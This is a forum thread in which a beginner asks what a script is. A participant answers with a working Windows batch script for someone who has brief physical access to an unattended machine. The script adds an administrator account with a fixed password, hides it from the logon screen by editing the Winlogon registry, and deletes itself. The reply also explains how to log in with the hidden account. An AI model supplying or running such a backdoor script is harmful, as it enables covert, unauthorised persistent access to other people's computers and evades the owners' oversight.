Help Me !!

How to use a script

This topic contains 1 reply, has 2 voices, and was last updated by  runeko 7 years, 1 month ago.

• Author

boxing
    Participant

How to use a script

I’m wondering how do you use a script and also if someone could explain what exactly is a script? The information i gathered from Google (This may be incorrect) was that scripts are used for finding XSS vulnerabilities.

runeko
    Participant

Scripting Language – Wikipedia:
    https://en.wikipedia.org/wiki/Scripting_language

About your question on how to use them to hack… I’d advice you to learn Batch, it’s not very hard, and a lot of people uses Windows.

I wouldn’t exactly call it hacking, but scripts can come handy for certain situations.

For example, imagine you have temporal physical access to a certain machine with administrator rights (common situation, as some derfs leave their stations open and unguarded).

In this situation, with a simple batch script and a pendrive you could “expand the duration” of those administration rights in a matter of milliseconds. For example, by making your own account with administrator rights in the machine and then hiding it.

A sample of the little particular thing I’m talking about.

Code:

@echo off

SET NEWUSER=adm1n
    SET PASS=passw0rd

net user %NEWUSER% %PASS% /add && net localgroup administrators %NEWUSER% /add>nul 2>&1
    reg.exe ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v %NEWUSER% /t REG_DWORD /d 0 /f>nul 2>&1
    DEL %0

This is a batch script, thought to be used on Windows XP. It will create an user, and hide it, by editing the corresponding registry entry.

The way to log in using that account, is using ctrl+alt+del twice on logon screen, then typing the corresponding credentials set in the variables in the script itself.

I would say that scripts basically automate (and therefore speed-up) actions that could have been done manually. But it is definitely also possible to use them to create actual small applications.

Imagine that you need to rename a big bunch of files, an script is a handy way to get that done faster than manually.

It’s all a matter of knowledge and creativity.

Best Regards.

You must be logged in to reply to this topic.